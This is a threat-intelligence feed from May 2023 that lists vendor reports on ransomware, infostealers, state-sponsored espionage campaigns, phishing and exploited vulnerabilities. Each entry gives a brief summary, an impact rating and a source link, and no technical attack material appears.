Microsoft has discovered stealthy malicious activity focused on credential access and network system discovery, attacking critical infrastructure organizations in the United States. The attack is carried out by Volt Typhoon, a state-sponsored actor based in China that focuses on espionage and information stealing. Microsoft is confident that this Volt Typhoon campaign is pursuing the development of capabilities that could disrupt critical communications infrastructure between the United States and the Asia region during future crises.
Source: https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/
2023-05-27
Over_200_Corporate_Victims_Hit_by_New_Ransomware_Wave
LOW
Intel Source:
Cyble
Intel Name:
Over_200_Corporate_Victims_Hit_by_New_Ransomware_Wave
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs (CRIL) discovered that the increasing adoption of double extortion by ransomware groups is an alarming trend. We are witnessing a surge in ransomware attacks that not only encrypt valuable corporate data but also involve the threat of public exposure unless the attackers' demands are fulfilled.
Source: https://blog.cyble.com/2023/05/23/new-ransomware-wave-engulfs-over-200-corporate-victims/
2023-05-27
The_Technical_Examination_of_Pikabot
LOW
Intel Source:
Zscaler
Intel Name:
The_Technical_Examination_of_Pikabot
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
Researchers from Zscaler have identified a new malware trojan named Pikabot, which emerged in early 2023 and consists of two components: a loader and a core module.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
2023-05-27
Agrius_threat_actor_attacks_against_Israel
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Agrius_threat_actor_attacks_against_Israel
Date of Scan:
2023-05-27
Impact:
MEDIUM
Summary:
The threat actor Agrius, believed to be Iranian, keeps attacking Israeli targets, hiding the destructive impact behind ransomware attacks. Recently the group deployed Moneybird, a new ransomware written in C++. Despite presenting itself under a new group name, Moneybird, this is yet another Agrius alias.
Source: https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/
2023-05-27
Resurgence_of_Vacation_Request_Phishing_Emails_in_Summer_Time_Scams
LOW
Intel Source:
Cofense
Intel Name:
Resurgence_of_Vacation_Request_Phishing_Emails_in_Summer_Time_Scams
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
Cofense researchers have observed a phishing campaign where the threat actor sent an email to a user that claimed to be from the HR Department and provided the user with a link to submit their annual leave requests.
Source: https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
2023-05-27
Return_of_BlackByte_Ransomware_with_New_Technology_Version
LOW
Intel Source:
Cluster25
Intel Name:
Return_of_BlackByte_Ransomware_with_New_Technology_Version
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
The Cluster25 Threat Intel Team has identified that BlackByte is a Ransomware-as-a-Service group known for the use of the homonymous malware, which is constantly updated and spread in different variants. The team used the above function in an IDAPython script that allowed them to retrieve all invocations of the functions responsible for the dynamic loading of the APIs, in order to continue with the static analysis of the malware.
Source: https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt
2023-05-26
Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_Software
MEDIUM
Intel Source:
Sekoia
Intel Name:
Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_Software
Date of Scan:
2023-05-26
Impact:
MEDIUM
Summary:
Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
Source: https://blog.sekoia.io/unveiling-of-a-large-resilient-infrastructure-distributing-information-stealers/
2023-05-26
Espionage_Activity_UAC_0063
LOW
Intel Source:
CERT-UA
Intel Name:
Espionage_Activity_UAC_0063
Date of Scan:
2023-05-26
Impact:
LOW
Summary:
CERT-UA researchers have observed that on 04/18/2023 and 04/20/2023, e-mails were sent to the department's e-mail address from the official mailbox of the Embassy of Tajikistan in Ukraine (probably as a result of the latter being compromised); the first contained an attachment in the form of a document with a macro, and the second a link to the same document.
Source: https://cert.gov.ua/article/4697016
2023-05-26
Lazarus_Group_Targeting_Windows_IIS_Web_Servers
LOW
Intel Source:
ASEC
Intel Name:
Lazarus_Group_Targeting_Windows_IIS_Web_Servers
Date of Scan:
2023-05-26
Impact:
LOW
Summary:
ASEC researchers have identified that the Lazarus group, which is known to receive support on a national scale, is carrying out attacks against Windows IIS web servers.
Source: https://asec.ahnlab.com/en/53132/
2023-05-26
Diving_Deep_into_GoldenJackal_APT_Group
LOW
Intel Source:
Securelist
Intel Name:
Diving_Deep_into_GoldenJackal_APT_Group
Date of Scan:
2023-05-26
Impact:
LOW
Summary:
Securelist researchers have monitored the GoldenJackal APT Group since mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo, and JackalScreenWatcher.
Source: https://securelist.com/goldenjackal-apt-group/109677/
2023-05-26
StrelaStealer_Malware_Targeting_Spanish_Users
LOW
Intel Source:
ASEC
Intel Name:
StrelaStealer_Malware_Targeting_Spanish_Users
Date of Scan:
2023-05-26
Impact:
LOW
Summary:
ASEC researchers have observed that the StrelaStealer Infostealer is distributed to Spanish users. It was initially discovered around November 2022 and distributed as an attachment to spam emails.
Source: https://asec.ahnlab.com/en/53158/
2023-05-26
Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails
LOW
Intel Source:
ASEC
Intel Name:
Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails
Date of Scan:
2023-05-26
Impact:
LOW
Summary:
ASEC researchers have discovered the DarkCloud malware is distributed via spam email. It is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud.
Source: https://asec.ahnlab.com/en/53128/
2023-05-26
Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails_Detected
LOW
Intel Source:
Checkpoint
Intel Name:
Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails_Detected
Date of Scan:
2023-05-26
Impact:
LOW
Summary:
Checkpoint researchers have identified that malware developers strive to create new threats that can bypass the defenses of antivirus products. “Packing” and “crypting” services are specifically designed to resist analysis. GuLoader is one of the most prominent services cybercriminals use to evade antivirus detection.
Source: https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/
2023-05-24
Middle_East_Targeted_by_New_Kernel_Driver_Exploit
LOW
Intel Source:
Fortinet
Intel Name:
Middle_East_Targeted_by_New_Kernel_Driver_Exploit
Date of Scan:
2023-05-24
Impact:
LOW
Summary:
Fortinet researchers have discovered suspicious executables that make use of open-source tools and frameworks. One of the things that we keep an eye out for is tools that use the Donut project. Donut is a position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters.
Source: https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries
2023-05-22
IcedID_Macro_Ends_in_Nokoyawa_Ransomware
LOW
Intel Source:
DFIR Report
Intel Name:
IcedID_Macro_Ends_in_Nokoyawa_Ransomware
Date of Scan:
2023-05-22
Impact:
LOW
Summary:
Researchers from DFIR Report have identified an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian organizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target organizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on documents downloaded from the internet.
Source: https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/
2023-05-22
BatLoader_Campaign_Impersonates_ChatGPT_and_Midjourney_to_Deliver_Redline_Stealer
LOW
Intel Source:
Esentire
Intel Name:
BatLoader_Campaign_Impersonates_ChatGPT_and_Midjourney_to_Deliver_Redline_Stealer
Date of Scan:
2023-05-22
Impact:
LOW
Summary:
Esentire researchers have observed that threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer.
Source: https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks
2023-05-22
New_Signed_Kernel_Driver_Deployed_BlackCat_Ransomware
MEDIUM
Intel Source:
TrendMicro
Intel Name:
New_Signed_Kernel_Driver_Deployed_BlackCat_Ransomware
Date of Scan:
2023-05-22
Impact:
MEDIUM
Summary:
TrendMicro researchers have analyzed the BlackCat ransomware incident that occurred in February 2023, where they observed a new capability, mainly used for the defense evasion phase, that overlaps with the earlier malicious drivers disclosed by the three vendors.
Source: https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html
2023-05-22
Hackers_Targeting_Vulnerable_WordPress_Elementor_plugin_Versions
LOW
Intel Source:
Wordfence
Intel Name:
Hackers_Targeting_Vulnerable_WordPress_Elementor_plugin_Versions
Date of Scan:
2023-05-22
Impact:
LOW
Summary:
Wordfence researchers have identified that several versions of the WordPress plugin Essential Addons for Elementor impacted by the now-addressed critical CVE-2023-32243 vulnerability are being actively scanned and targeted by threat actors following the release of a proof-of-concept exploit.
Source: https://www.wordfence.com/blog/2023/05/psa-attackers-actively-exploiting-critical-vulnerability-in-essential-addons-for-elementor/
2023-05-19
Brute_Ratel_remains_rare_and_targeted
LOW
Intel Source:
Sophos
Intel Name:
Brute_Ratel_remains_rare_and_targeted
Date of Scan:
2023-05-19
Impact:
LOW
Summary:
The commercial attack tool’s use by threat actors has faded after an initial flurry, while Cobalt Strike remains the go-to post-exploitation tool for many.
Source: https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/
2023-05-19
TurkoRat_found_hiding_in_the_npm_package
LOW
Intel Source:
Reversing Labs
Intel Name:
TurkoRat_found_hiding_in_the_npm_package
Date of Scan:
2023-05-19
Impact:
LOW
Summary:
ReversingLabs researchers found two malicious packages that contained TurkoRat, an open source infostealer that lurked on npm for two months before being detected.
Source: https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
2023-05-19
CapCut_s_Video_to_Deliver_Multiple_Stealers
LOW
Intel Source:
Cyble
Intel Name:
CapCut_s_Video_to_Deliver_Multiple_Stealers
Date of Scan:
2023-05-19
Impact:
LOW
Summary:
Cyble researchers recently discovered a couple of phishing websites disguised as video editing software. These fake sites lure users into downloading and executing various malware families such as stealers and RATs. In these campaigns, threat actors targeted the CapCut video editing tool, a product of ByteDance, the same parent company that owns TikTok.
Source: https://blog.cyble.com/2023/05/19/capcut-users-under-fire/
2023-05-19
AndoryuBot_s_DDOS_wild_behavior
LOW
Intel Source:
Cyble
Intel Name:
AndoryuBot_s_DDOS_wild_behavior
Date of Scan:
2023-05-19
Impact:
LOW
Summary:
The Cyble group observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot. This incident indicates that Threat Actors are actively looking for vulnerable Ruckus assets for exploitation purposes. AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.
Source: https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/
2023-05-19
Distributing_DarkCrystal_RAT_by_fake_Desktop_Authenticator_App
LOW
Intel Source:
Bushidotoken
Intel Name:
Distributing_DarkCrystal_RAT_by_fake_Desktop_Authenticator_App
Date of Scan:
2023-05-19
Impact:
LOW
Summary:
The Bushidotoken researcher recently discovered a threat actor campaign that uses fake websites to distribute malware; this TTP appears to be on the rise. A suspected Russia-based threat actor tried to duplicate the website of a legitimate open-source desktop app called Steam Desktop Authenticator, which is simply a convenient desktop version of the mobile authenticator app.
Source: https://blog.bushidotoken.net/2023/05/fake-steam-desktop-authenticator-app.html
2023-05-18
The_Korean_VPN_installer_is_being_used_to_distribute_SparkRAT
MEDIUM
Intel Source:
ASEC
Intel Name:
The_Korean_VPN_installer_is_being_used_to_distribute_SparkRAT
Date of Scan:
2023-05-18
Impact:
MEDIUM
Summary:
AhnLab Security Emergency response Center (ASEC) has recently discovered SparkRAT being distributed within the installer of a certain VPN program. SparkRAT is a Remote Administration Tool (RAT) developed in GoLang. When installed on a user’s system, it can perform a variety of malicious behaviors, such as executing commands remotely, controlling files and processes, downloading additional payloads, and collecting information from the infected system, for example by taking screenshots.
Source: https://asec.ahnlab.com/en/52899/
2023-05-18
The_attackers_used_email_security_providers_for_spreading_phishing_attacks
LOW
Intel Source:
Cofense
Intel Name:
The_attackers_used_email_security_providers_for_spreading_phishing_attacks
Date of Scan:
2023-05-18
Impact:
LOW
Summary:
Threat actors increasingly send malicious URLs within HTML attachments, which makes it more challenging for Secure Email Gateways (SEGs) to block them. The Phishing Defence Centre analyzed a phishing campaign impersonating an email security provider to trick recipients into providing their user credentials via a malicious HTML attachment.
Source: https://cofense.com/blog/threat-actors-impersonate-email-security-providers-to-steal-user-credentials/
2023-05-18
The_analysis_of_QakBot_Infrastructure
MEDIUM
Intel Source:
Team Cymru
Intel Name:
The_analysis_of_QakBot_Infrastructure
Date of Scan:
2023-05-18
Impact:
MEDIUM
Summary:
Team Cymru shared their analysis of QakBot, in which various hypotheses were identified and tested. Their key findings: QakBot C2 servers are not separated by affiliate ID; QakBot C2 servers from older configurations continue to communicate with upstream C2 servers months after being used in campaigns; and three upstream C2 servers were identified in Russia, two of which behave similarly based on network telemetry patterns and the geolocations of the bot C2s communicating with them.
Source: https://www.team-cymru.com/post/visualizing-qakbot-infrastructure
2023-05-18
BlackSuit_Ransomware_ragets_VMware_ESXi_servers
HIGH
Intel Source:
Cyble
Intel Name:
BlackSuit_Ransomware_ragets_VMware_ESXi_servers
Date of Scan:
2023-05-18
Impact:
HIGH
Summary:
Cyble Labs researchers observed an increase in the number of ransomware groups, such as Cylance and Royal, targeting Linux. The widespread use of Linux makes it an appealing target for ransomware groups, as a single attack can potentially compromise numerous systems.
Source: https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/
2023-05-18
Joint_Cybersecurity_Advisory_on_BianLian_Ransomware_Group
MEDIUM
Intel Source:
CISA
Intel Name:
Joint_Cybersecurity_Advisory_on_BianLian_Ransomware_Group
Date of Scan:
2023-05-18
Impact:
MEDIUM
Summary:
The FBI, CISA and Australian Cyber Security Centre (ACSC) released the joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations back in March 2023. BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
2023-05-18
The_exploitation_of_critical_vulnerability_CVE_2023_32243
HIGH
Intel Source:
Wordfence
Intel Name:
The_exploitation_of_critical_vulnerability_CVE_2023_32243
Date of Scan:
2023-05-18
Impact:
HIGH
Summary:
Essential Addons for Elementor, a WordPress plugin, recently released a patch for a critical vulnerability that allows any unauthenticated user to reset arbitrary user passwords, including those of accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.
Source: https://www.wordfence.com/blog/2023/05/psa-attackers-actively-exploiting-critical-vulnerability-in-essential-addons-for-elementor/
2023-05-17
New_8220_Gang_Strategies
MEDIUM
Intel Source:
TrendMicro
Intel Name:
New_8220_Gang_Strategies
Date of Scan:
2023-05-17
Impact:
MEDIUM
Summary:
Researchers documented the recent activities of 8220 Gang, which has been active in recent months. In their article they describe an observed attack exploiting the Oracle WebLogic vulnerability CVE-2017-3506, captured by one of their honeypots. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic and, when exploited, can enable attackers to execute arbitrary commands remotely through an HTTP request with a specifically crafted XML document.
Source: https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html
2023-05-17
Uncovering_RedStinger_new
MEDIUM
Intel Source:
Malwarebytes
Intel Name:
Uncovering_RedStinger_new
Date of Scan:
2023-05-17
Impact:
MEDIUM
Summary:
Since the conflict between Russia and Ukraine began last year, the tension has not been only political; it is no surprise that the cybersecurity landscape between the two countries has also been tense. A former researcher from the Malwarebytes Threat Intelligence Team discovered a new, interesting lure that targeted the Eastern Ukraine region, reported the finding to the public, and tracked this actor as Red Stinger. These findings remained private for a while, but Kaspersky recently shared information about the same actor (which it calls Bad Magic).
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
2023-05-17
Malicious_Python_Packages_via_Supply_Chain_Attacks
MEDIUM
Intel Source:
Fortinet
Intel Name:
Malicious_Python_Packages_via_Supply_Chain_Attacks
Date of Scan:
2023-05-17
Impact:
MEDIUM
Summary:
The FortiGuard Labs team discovered over 30 new zero-day attacks in PyPI packages (Python Package Index). These were found between late March and late April by monitoring an open-source ecosystem.
Source: https://www.fortinet.com/blog/threat-research/more-supply-chain-attacks-via-malicious-python-packages?&web_view=true
2023-05-17
The_Water_Orthrus_s_New_Campaigns
MEDIUM
Intel Source:
TrendMicro
Intel Name:
The_Water_Orthrus_s_New_Campaigns
Date of Scan:
2023-05-17
Impact:
MEDIUM
Summary:
TrendMicro researchers have been monitoring the activities of a threat actor named Water Orthrus, which spread CopperStealer malware via pay-per-install (PPI) networks. In March 2023, the researchers observed two campaigns delivering new malware that they named CopperStealth and CopperPhish. Both malware families have characteristics close to those of CopperStealer and were likely developed by the same author, leading the researchers to believe that these campaigns are likely Water Orthrus’ new activities.
Source: https://www.trendmicro.com/en_us/research/23/e/water-orthrus-new-campaigns-deliver-rootkit-and-phishing-modules.html?&web_view=true
2023-05-17
The_Lancefly_APT_group_using_Merdoor_backdoor
MEDIUM
Intel Source:
Symantec
Intel Name:
The_Lancefly_APT_group_using_Merdoor_backdoor
Date of Scan:
2023-05-17
Impact:
MEDIUM
Summary:
The Lancefly APT group is attacking organizations in South and Southeast Asia using a custom-written backdoor. Lancefly’s custom malware, named Merdoor, is a powerful backdoor that has existed since 2018. Its recent targets are based in South and Southeast Asia, in sectors including government, aviation, education, and telecoms. Symantec researchers observed that the activity also appeared to be highly targeted, with only a small number of machines infected.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor?web_view=true
2023-05-16
An_In_Depth_Look_at_Akira_Ransomware
MEDIUM
Intel Source:
Cyble
Intel Name:
An_In_Depth_Look_at_Akira_Ransomware
Date of Scan:
2023-05-16
Impact:
MEDIUM
Summary:
Cyble researchers have come across a Reddit post about a new ransomware variant named “Akira”, actively targeting numerous organizations and exposing their sensitive data. To increase the chances of payment from victims, Akira ransomware exfiltrates and encrypts their data using a double-extortion technique. The attackers then threaten to sell or leak the stolen data on the dark web if the ransom is not paid for decrypting the data.
Source: https://blog.cyble.com/2023/05/10/unraveling-akira-ransomware/
2023-05-16
LokiLocker_Ransomware_Distributed_in_Korea
MEDIUM
Intel Source:
ASEC
Intel Name:
LokiLocker_Ransomware_Distributed_in_Korea
Date of Scan:
2023-05-16
Impact:
MEDIUM
Summary:
AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of the LokiLocker ransomware in Korea. This ransomware is almost identical to the BlackBit ransomware and their common traits
Source: https://asec.ahnlab.com/en/52570/
2023-05-16
Ongoing_Phishing_Campaign_uses_Meme_Filled_Code_to_Drop_XWorm_Payloads
MEDIUM
Intel Source:
Securonix
Intel Name:
Ongoing_Phishing_Campaign_uses_Meme_Filled_Code_to_Drop_XWorm_Payloads
Date of Scan:
2023-05-16
Impact:
MEDIUM
Summary:
Over the last couple of months, the Securonix Threat Research team identified and tracked an interesting, ongoing attack campaign. The campaign (tracked by Securonix as MEME#4CHAN) leverages rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload, to infect its victims. Securonix dived into this campaign with an in-depth technical analysis.
Source: https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/
2023-05-16
A_new_ransomware_variant_Rancoz
LOW
Intel Source:
Cyble
Intel Name:
A_new_ransomware_variant_Rancoz
Date of Scan:
2023-05-16
Impact:
LOW
Summary:
This month Cyble researchers observed a ransomware variant called Rancoz, which was identified by the researcher @siri_urz. During the investigation, it was observed that this ransomware is similar to and overlaps with the Vice Society ransomware.
Source: https://blog.cyble.com/2023/05/11/dissecting-rancoz-ransomware/
2023-05-16
Eastern_European_APT_Cyber_Operations_Undetected_Since_2020
LOW
Intel Source:
Malwarebytes
Intel Name:
Eastern_European_APT_Cyber_Operations_Undetected_Since_2020
Date of Scan:
2023-05-16
Impact:
LOW
Summary:
Malwarebytes researchers have discovered a new, interesting lure that targeted the Eastern Ukraine region and reported the finding to the public. Moreover, they started tracking the actor behind it, which they internally codenamed Red Stinger.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
2023-05-16
The_Aurora_stealer_via_Invalid_Printer_loader
LOW
Intel Source:
Malwarebytes
Intel Name:
The_Aurora_stealer_via_Invalid_Printer_loader
Date of Scan:
2023-05-16
Impact:
LOW
Summary:
Malwarebytes Labs shared their discovery of this malicious campaign and its connections to other attacks. They discovered that a threat actor was using malicious ads to redirect users to what looks like a Windows security update. The scheme looked very legitimate and closely resembled what you'd expect from Microsoft. That fake security update was using a newly identified loader that, at the time of the campaign, evaded malware sandboxes and bypassed practically all antivirus engines. Malwarebytes Labs patched that loader and identified its actual payload as Aurora stealer.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/05/fake-system-update-drops-new-highly-evasive-loader
2023-05-16
Maori_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
Maori_Ransomware
Date of Scan:
2023-05-16
Impact:
MEDIUM
Summary:
FortiGuard Labs recently came across a new ransomware variant called Maori. Like other ransomware variants, it encrypts files on victims’ machines to extort money. Interestingly, this variant is designed to run on Linux architecture and is coded in Go, which is somewhat rare and increases the analysis difficulty.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-maori?&web_view=true
2023-05-15
A_new_undetected_variant_of_Linux_Backdoor_BPFDoor
MEDIUM
Intel Source:
Deep Instinct Blog
Intel Name:
A_new_undetected_variant_of_Linux_Backdoor_BPFDoor
Date of Scan:
2023-05-15
Impact:
MEDIUM
Summary:
BPFdoor is a Linux-specific, low-profile, passive backdoor intended to maintain a persistent, long-term foothold in already-breached networks and environments and functions primarily to ensure an attacker can re-enter an infected system over an extended period of time, post-compromise.
Source: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
2023-05-14
Analysis_of_a_evasive_Shellcode
LOW
Intel Source:
McAfee
Intel Name:
Analysis_of_a_evasive_Shellcode
Date of Scan:
2023-05-14
Impact:
LOW
Summary:
McAfee researchers have observed NSIS-based installers delivered via email as malspam that use plugin libraries to execute the GU shellcode on the victim system.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/guloader-campaigns-a-deep-dive-analysis-of-a-highly-evasive-shellcode-based-loader/?&web_view=true
2023-05-14
Exploitation_of_CVE_2023_27350
LOW
Intel Source:
CISA
Intel Name:
Exploitation_of_CVE_2023_27350
Date of Scan:
2023-05-14
Impact:
LOW
Summary:
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
2023-05-13
ASEC_Weekly_Statistics_May_1_7th_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Statistics_May_1_7th_2023
Date of Scan:
2023-05-13
Impact:
LOW
Summary:
ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypots. Their post shares cases of phishing email distribution during the week from April 9th, 2023 to April 15th, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/52488/
2023-05-13
A_cybercriminal_group_attempted_an_extortion_scheme_against_Dragos
LOW
Intel Source:
Dragos
Intel Name:
A_cybercriminal_group_attempted_an_extortion_scheme_against_Dragos
Date of Scan:
2023-05-13
Impact:
LOW
Summary:
Last week, a known hacker group attempted, and failed, an extortion scheme against Dragos. No Dragos systems were breached, including anything related to the Dragos Platform. Dragos has shared what happened during this recent failed extortion attempt. The cybercriminal group attempted to compromise Dragos's information resources. The group gained access by compromising the personal email address of a new sales employee prior to their start date, and subsequently used their personal information to impersonate the Dragos employee and accomplish initial steps in the employee onboarding process.
Source: https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/
2023-05-13
Threat_Actors_Build_ESXi_Lockers_Using_Leaked_Babuk_Code
MEDIUM
Intel Source:
Sentinelone
Intel Name:
Threat_Actors_Build_ESXi_Lockers_Using_Leaked_Babuk_Code
Date of Scan:
2023-05-13
Impact:
MEDIUM
Summary:
SentinelLabs researchers have identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil.
Source: https://www.sentinelone.com/labs/hypervisor-ransomware-multiple-threat-actor-groups-hop-on-leaked-babuk-code-to-build-esxi-lockers/
2023-05-12
An_Expansion_of_RapperBot_DDoS_Botnet_into_Cryptojacking
LOW
Intel Source:
Fortinet
Intel Name:
An_Expansion_of_RapperBot_DDoS_Botnet_into_Cryptojacking
Date of Scan:
2023-05-12
Impact:
LOW
Summary:
FortiGuard Labs researchers have analyzed new samples of the RapperBot campaign active since January 2023. The threat actors have started venturing into cryptojacking, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot.
Source: https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking
2023-05-12
Malspam_Campaign_Delivering_PowerDash
LOW
Intel Source:
Cert-PL
Intel Name:
Malspam_Campaign_Delivering_PowerDash
Date of Scan:
2023-05-12
Impact:
LOW
Summary:
CERT-PL researchers have observed a malspam campaign delivering previously unseen PowerShell malware. They dubbed this malware family "PowerDash" because of the "/dash" path on the C2 server, which is used as a gateway for bots.
Source: https://cert.pl/en/posts/2023/05/powerdash-malspam/
2023-05-12
CLR_SqlShell_malware_Attack_MS_SQL_Servers
MEDIUM
Intel Source:
ASEC
Intel Name:
CLR_SqlShell_malware_Attack_MS_SQL_Servers
Date of Scan:
2023-05-12
Impact:
MEDIUM
Summary:
ASEC analyzed the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior.
Source: https://asec.ahnlab.com/en/52479/
2023-05-12
The_Examination_of_Highly_Evasive_Shellcode_Based_Loader
LOW
Intel Source:
McAfee
Intel Name:
The_Examination_of_Highly_Evasive_Shellcode_Based_Loader
Date of Scan:
2023-05-12
Impact:
LOW
Summary:
McAfee researchers have deeply analyzed the GuLoader campaigns and found a rise in NSIS-based installers delivered via email as malspam that use plugin libraries to execute the GU shellcode on the victim system.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/guloader-campaigns-a-deep-dive-analysis-of-a-highly-evasive-shellcode-based-loader/
2023-05-12
DownEx_Espionage_activity_in_Central_Asia
MEDIUM
Intel Source:
Bitdefender
Intel Name:
DownEx_Espionage_activity_in_Central_Asia
Date of Scan:
2023-05-12
Impact:
MEDIUM
Summary:
Last year Bitdefender Labs researchers observed an attack on foreign government institutions in Kazakhstan. During the analysis, it was discovered that this was a highly targeted attack aimed at gaining access in order to exfiltrate data. Bitdefender Labs researchers monitored the attack and the region for other similar attacks for a while. Recently they detected another attack in Afghanistan and collected additional samples and observations.
Source: https://www.bitdefender.com/blog/businessinsights/deep-dive-into-downex-espionage-operation-in-central-asia/
2023-05-10
MitM_Phishing_Growing_and_Using_Real_Login_Process_to_Steal_Credentials
LOW
Intel Source:
Cofense
Intel Name:
MitM_Phishing_Growing_and_Using_Real_Login_Process_to_Steal_Credentials
Date of Scan:
2023-05-10
Impact:
LOW
Summary:
Cofense researchers have observed that man-in-the-middle (MitM) phishing attacks are increasing rapidly: they identified a 35% increase in volume reaching inboxes between Q1 2022 and Q1 2023; 94% of MitM credential phishing attacks reaching inboxes targeted O365 authentication; and 89% of campaigns used at least one URL redirect, with 55% using two or more.
Source: https://cofense.com/blog/cofense-intelligence-strategic-analysis-2/
2023-05-10
Royal_Ransomware_Expands_to_Target_Linux_and_VMware_ESXi
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Royal_Ransomware_Expands_to_Target_Linux_and_VMware_ESXi
Date of Scan:
2023-05-10
Impact:
MEDIUM
Summary:
PaloAlto researchers have observed that the Royal ransomware group has recently launched a variant of its encryptor malware built in the form of executable and linkable format (ELF) binary. Also, they started using the BatLoader dropper and SEO poisoning for initial access.
Source: https://unit42.paloaltonetworks.com/royal-ransomware/
2023-05-10
Taking_a_Closer_Look_at_Israel_Based_BEC_Attacks
HIGH
Intel Source:
Abnormal
Intel Name:
Taking_a_Closer_Look_at_Israel_Based_BEC_Attacks
Date of Scan:
2023-05-10
Impact:
HIGH
Summary:
Researchers from Abnormal Security have discovered that an Israel-based threat group has conducted 350 BEC campaigns since February 2021, with email attacks targeting employees from 61 countries across six continents.
Source: https://cdn2.assets-servd.host/gifted-zorilla/production/files/Exploring-the-Rise-of-Israel-Based-BEC-Attacks.pdf
2023-05-09
SideWinder_Using_Server_Based_Polymorphism_Technique
LOW
Intel Source:
Blackberry
Intel Name:
SideWinder_Using_Server_Based_Polymorphism_Technique
Date of Scan:
2023-05-09
Impact:
LOW
Summary:
BlackBerry researchers have observed that APT Group SideWinder is accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.
Source: https://blogs.blackberry.com/en/2023/05/sidewinder-uses-server-side-polymorphism-to-target-pakistan
2023-05-09
IRCTC_fake_apps
LOW
Intel Source:
Quickheal
Intel Name:
IRCTC_fake_apps
Date of Scan:
2023-05-09
Impact:
LOW
Summary:
